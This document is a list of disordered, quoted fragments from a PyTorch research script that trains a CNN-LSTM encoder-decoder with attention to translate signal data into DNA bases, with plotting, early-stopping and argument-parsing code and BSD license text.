"length\", x_lengths) sorted_len, sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs",
"super(LSTMencoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers =",
"OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF",
"list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\") ax = fig.add_subplot(1, 3,",
"0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val = 0.0 running_editd_train = 0.0",
"#hidden = self.init_hidden() # Forward pass through LSTM layer # shape of lstm_in:",
"batch_size x out_size x seq_length output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val, 0, labels_val,",
"is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig",
"* hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) self.port = port",
"to zero optimizer.zero_grad() batch_x = data[0] batch_y = data[1] seq_len = data[2] lab_len",
"sorted_len.cpu().numpy(), batch_first=True) # Define the LSTM layer lstm_out, hidden = self.lstm(packed_seq) # [seq_len,",
"acc_train, editd_train = input[0], input[2], input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2,",
"= np.linalg.norm(m[start: end], ord=2) # cell gate start, end = n//2, n//2 +",
"length (i) >= true seq length if i >= true_y_len[-1].item() and len(true_y_len) >",
"sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output =",
"backward pass, optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm, 1, 2)",
"= 0 epoch_acc = 0 epoch_loss_val = 0 epoch_acc_val = 0 epoch_editd_val =",
"#dict_training_editd2[updates] = running_editd_train #/ float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] =",
"not in name: print(name,param.data.size()) n = param.size(0) # forget gate start, end =",
"earlyStopping: # initialize the early_stopping object early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True,",
"= np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for idx, u in enumerate(x_len): idx_b",
"default=\"None\", help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1, 1, 1], help=\"Strides in",
"shape of lstm_in: [batch, input_dim] # shape of lstm_out: [seq_len, batch, output_dim] #",
"dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) # Define the",
"Variable object inputs, labels, labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) #",
"y_len] df = pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\")",
"1 and a few hundreds, e.g. [batch size] = 32 is a good",
"< teacher_forcing_ratio # put on position: seq, 0:true_batch_size, features # rest: seq, true_batch_size:max_seq_len,",
"output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val != 5 # indices of not",
"edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation",
"'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path",
"import EarlyStopping from cnn import SimpleCNN, BasicBlock, SimpleCNN_res from cnn import outputLen_Conv, outputLen_AvgPool,",
"= val_ds[1] input_y10_val = val_ds[2] signal_len_val = val_ds[3] label_len_val = val_ds[4] read_val =",
"4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) self.port =",
"* 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30) total_train_loss = 0 loss_iteration =",
"(a, b), where a and b both have shape (num_layers, batch_size, hidden_dim). if",
"FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT",
"= hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_decoder =",
"= val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD)",
"hot encode input input_decoder = label if teacher_force else onehot # [batch size,",
"read_idx, batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10, read_idx) # create",
"f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={}, weight decay={}, clipping value={}, lr={}\\n\" .format(epochs, batch, earlyStopping,",
"BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,",
"\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,",
"* hidden_size, bias=bias) # self.reset_parameters() def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for",
"so that padded items in the sequence won't be shown to the LSTM",
"attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size",
"def __init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size",
"dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self): # This is",
"ratio= {}\".format(teacher_forcing_ratio), \", update= \", updates, \", half of updates= \", int((len(train_loader) *",
"!= None) and (updates % make_validation == 0): # or (updates == n_epochs-1)):",
"torch.utils.data import Dataset, DataLoader from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import OneHotEncoder from",
"seconds = divmod(rem, 60) print(\"=\" * 100) checkpoint = { 'updates': out12[-1], 'model':",
"[dict_weights, dict_gradients]]) def count_parameters(model): return sum(p.numel() for p in model.parameters() if p.requires_grad) def",
"F.tanh(cy) return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch shape",
"* cellgate) hy = outgate * F.tanh(cy) #print(\"hy\", hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port)",
"open(file_out, 'rb') as handle: read_data = pickle.load(handle) save_files_path = script_dir + '/training_result_{}/'.format(fname) writer",
"= True, help=\"File path to the pickle input file.\") parser.add_argument('-o', '--output', required =",
"start, end = n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start,",
"1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq, feature), lstm_in_unroll, hidden =",
"forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate start, end = 0, n//4",
"None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train =",
"parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set",
"teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1), mode) output = torch.transpose(output, 0, 1).contiguous() # input",
"hidden[0] hidden2 = hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]],",
"encoded_pred = [] for p in seq: if p == 4: break encoded_pred.append(vocab[int(p.item())])",
"loss # output = (seq*batch, out dim), target = (seq*batch) # Target nicht",
"def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder = False, bidirectional = False,",
"nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention:",
"epoch_loss_val = 0 epoch_acc_val = 0 epoch_editd_val = 0 epoch_editd = 0 print(\"=\"",
"on the validation set val_losses = [] val_acc = [] val_editd = []",
"label_len = train_ds[4] read_train = train_ds[5] #Get training data train_loader = get_train_loader_trainVal(input_x, signal_len,",
"out_size, seq_len ########################################### ##### Decoder ############################# ########################################### #### LSTM random_value = random.random() out_decoder,",
"hidden = args.hidden_units #256 forget_bias = args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers = args.lstm_layers",
"set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True):",
"input_biases[idx_b, idx] = np.linalg.norm(m[start: end], ord=2) # forget gate start, end = n//4,",
"val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(),",
"name and \"linear\" not in name: for b in [\"input\", \"forget\", \"cell\", \"output\"]:",
"for n_epochs for epoch in range(n_epochs): if earlyStopping and early_stopping.early_stop: # break epoch",
"self.hidden_dim * 2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention: # attention self.attn",
"has decresed, # and if it has, it will make a checkpoint of",
"bestPerformance2File(input, fname, editD=True): loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2],",
"LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define the LSTM layer lstm_out, hidden",
"not padded sequences true_y_len = true_y_len[not_padded_batches] # remove smallest element = last one",
"to sequence model # ----------- class Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__()",
"self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) # Define the output layer",
"total_train_loss = 0 loss_iteration = [] acc_iteration = [] editd_iteration = [] for",
"editd_iteration writer.close() if earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc,",
"def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train = input[0], input[2], input[4] fig",
"layer # shape of lstm_in: [batch, input_dim] # shape of lstm_out: [seq_len, batch,",
"script directory file_out = script_dir + \"/\" + infile print(file_out) with open(file_out, 'rb')",
"= input[0], input[1], input[2], input[3], input[4], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0,",
"decay={}, clipping value={}, lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced",
"a checkpoint of the current model if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates) if",
"= hidden[0] hidden2 = hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2],",
"= train_ds[0] input_y = train_ds[1] input_y10 = train_ds[2] signal_len = train_ds[3] label_len =",
"+ str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \", update= \", updates, \", half of",
"Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)),",
"end) # ingate start, end = 0, n//4 # ordering ingate, forgetgate, cellgate,",
"pickle input file.\") parser.add_argument('-o', '--output', required = True, help=\"Output folder name\") parser.add_argument('-g', '--gpu_port',",
"self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_encoder",
"sorted_labels, sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1), mode) output =",
"name, param in m.named_parameters(): if \"weight\" in name and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data)",
"torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True # Load data dict_classes = {0: \"A\", 1: \"C\",",
"length, batch size, output dim] top1 = input_decoder.argmax(1) # get argmax of prediction",
"= 0, n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start: end], ord=2) # forget gate start,",
"{} dict_gradients = {} running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0",
"= Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size x out_size x seq_length",
"features, seq len y = y[not_padded_batches, :, :] # batch-i, features, seq len",
"not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig =",
"sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases",
"seq_length x out_size # Calculate cross entropy loss # output = (seq*batch, out",
"earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2,",
"default=[1, 1, 1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11, 11], help=\"Kernel",
"NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,",
"my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10, read_idx) # create your datset train_loader",
"3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates",
"idx] = np.linalg.norm(m[start: end], ord=2) # output gate start, end = n//2 +",
"len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05))",
"hidden # Sequence to sequence model # ----------- class Seq2Seq(nn.Module): def __init__(self, cnn_encoder,",
"matrix_param[p] input[idx_p, idx] = np.linalg.norm(m, ord=2) if split_LSTMbiases and \"bias\" in p and",
"= sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val != 5 # indices of not padded elements",
"= encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2)",
"acc acc_iteration.append(acc) #if editD: # if updates % make_validation == 0: # ed",
"ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING",
"#self.attn = nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs,",
"loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train += loss.item() acc =",
"end = time.time() hours, rem = divmod(end-start, 3600) minutes, seconds = divmod(rem, 60)",
"loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings",
"A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR",
"\"T\", 4: \"<EOF>\", 5: \"<PAD>\"} # A=0, C=1, G=2, T=3, EOF=4 script_dir =",
"print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds is not None: input_x_val =",
"of updates= \", int((len(train_loader) * n_epochs)*0.5)) # Backward pass loss.backward() #clipping_value = 1",
"forcing or not teacher_force = random.random() < teacher_forcing_ratio # put on position: seq,",
"# self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self): # This is what",
"def get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10, read_idx, batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y,",
"float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration + 1)) * 100), \"Val Loss:",
"if (val_ds != None) and (updates % make_validation == 0): # or (updates",
"model if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates) if early_stopping.early_stop: print(\"Early stopping\") break if",
"forget_bias != \"None\" and \"lstm_encoder\" in name: print(name,param.data.size()) n = param.size(0) # forget",
"The Encoder # ----------- class LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__()",
"mode_type, beam_width) # seq_length x batch_size x out_size return out_decoder, labels_sorted, sorted_len_target #",
"self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim *",
"# indices of not padded elements loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss +=",
"p: n = matrix_param[p].shape[0] # input gate start, end = 0, n//4 input_biases[idx_b,",
"Distance\") plt.legend() plt.title(\"Edit distance vs. updates from validation set\") if pdf is not",
"seq = pred[idx] seq_target = target[idx] encoded_pred = [] for p in seq:",
"0 total_num_chars = 0 with torch.no_grad(): for iteration_val, data_val in enumerate(val_loader): batch_x_val =",
"b), where a and b both have shape (num_layers, batch_size, hidden_dim). if self.bidirectional:",
"acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation",
"= args.epochs make_validation = args.make_validation teacher = args.tf_ratio reduced_TF = args.reduced_tf earlyStopping =",
"columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path +",
"OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)",
"input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias",
"* 30) total_train_loss = 0 loss_iteration = [] acc_iteration = [] editd_iteration =",
"dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell,",
"loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation",
":].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train += acc acc_iteration.append(acc)",
"port=1): super(LSTMCellDecoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias = bias self.i2h",
"enumerate(target_lengths): length = int(length.item()) seq = pred[idx] seq_target = target[idx] encoded_pred = []",
"= in_lstm[negative_idx, : , :] # [batch, seq_len, input_dim] lab_len = lab_len[negative_idx] labels",
"port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional",
"in the sequence won't be shown to the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(),",
"reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val += acc_val val_acc.append(acc_val) if editD:",
"set val_losses = [] val_acc = [] val_editd = [] model.eval() total_ed =",
"= nn.Linear(hidden_size, 4 * hidden_size, bias=bias) # self.reset_parameters() def reset_parameters(self): std = 1.0",
"seq_len_cnn = seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, : , :] # [batch, seq_len, input_dim]",
"lstm_in_unroll, hidden = self.lstm_unroll(input, hidden) # [batch size, seq, hidden dim] lstm_in_unroll =",
"from trainings set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))),",
"if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\") ax",
"if \"bias\" in name and \"lstm\" in name and \"linear\" not in name:",
"max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy())) # this locator puts ticks at regular intervals",
"idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch",
"on GPU mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int, default=256,",
"self.dropout = dropout # Define the LSTM layer if self.bidirectional: if self.attention: self.lstm_unroll",
"self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting ############################# ########################################### #### sort by decreasing target length",
"def trainNet(model, train_ds, optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000,",
"lab_len = lab_len[negative_idx] labels = labels[negative_idx, :] labels10 = labels10[negative_idx, :, :] encoder_hidden,",
"bottom=0, top=2, hspace=0.2, wspace=0.5) i = 0 for p, label in zip(input, [\"input",
"gate\"]): i += 1 ax = fig.add_subplot(2, 2, i) for epoch in p.keys():",
"model has {count_parameters(model12):,} trainable parameters') f = open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile +",
"print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle)",
"output_val = torch.transpose(output_val, 0, 1).contiguous() # input for LSTM seq_length x out_size #",
"__init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder = False, bidirectional = False, port=1,",
"w.data.uniform_(-std, std) def forward(self, x, hidden): h, c = hidden h = h.view(x.size(0),",
"for x in seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target) editd += result num_chars +=",
"ed = 0 # ed2 = old_ed # # old_ed = ed2 #",
"= SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set = read_data[0] val_set = read_data[1] train_set = [train_set[0].cuda(port),",
"dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim = hidden,",
"NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS",
"c = hidden h = h.view(x.size(0), -1) c = c.view(x.size(0), -1) x =",
"bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: if",
"11], help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda",
"= torch.transpose(in_lstm, 1, 2) # input for LSTM batch_size x seq_length x input_size",
"as handle: read_data = pickle.load(handle) save_files_path = script_dir + '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir",
"prediction #if teacher forcing, use actual next token as next input #if not,",
"loss.backward() #clipping_value = 1 #arbitrary number of your choosing if clipping_value != \"None\":",
"attn_applied: b, 1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq, feature), lstm_in_unroll,",
"1.05)) plt.title(\"{} {}\".format(label, title)) if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def",
"in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm, 1, 2) # input for",
"reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train += loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1) ==",
"bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) # Define",
"running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates]",
"divmod(end-start, 3600) minutes, seconds = divmod(rem, 60) print(\"=\" * 100) checkpoint = {",
"batch_size=batch_size, shuffle=True) if val_ds != None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val,",
"idx, u in enumerate(x_len): idx_b = 0 matrix_param = dict_weights[u] for idx_p, p",
"in m.named_parameters(): if \"weight\" in name and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input,",
"decresed, # and if it has, it will make a checkpoint of the",
"on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val))",
"mode) output = torch.transpose(output, 0, 1).contiguous() # input for LSTM seq_length x out_size",
"= nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define the LSTM layer lstm_out, hidden = self.lstm(packed_seq)",
"for i in max_for: # Stop looping if we got to the last",
"shape of self.hidden: (a, b), where a and b both have shape (num_layers,",
"seq_len, input_dim] # pack_padded_sequence so that padded items in the sequence won't be",
"+ \" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target",
"encoded_target = ''.join([vocab[int(x.item())] for x in seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target) editd +=",
"to the pickle input file.\") parser.add_argument('-o', '--output', required = True, help=\"Output folder name\")",
"acc_iteration if editD: dict_training_editd[epoch] = editd_iteration writer.close() if earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"])",
"= args.output port = args.gpu_port SEED = args.set_seed batch = args.batch_size epochs =",
"#Our batch shape for input x is [batch, seq_len, input_dim] def __init__(self, input_dim,",
"32 is a good default value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel,",
"seq_len, input_dim] def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder = False, bidirectional=False,",
"+= acc running_acc_train += acc acc_iteration.append(acc) #if editD: # if updates % make_validation",
"!= None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping:",
"= 0.0 running_editd_val = 0.0 updates = 0 heatmap_g = None heatmap_w =",
"unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 =",
"loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest",
"if self.bidirectional: hidden1 = hidden[0] hidden2 = hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2)",
"(seq*batch) # Target nicht one-hot encoden reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1)",
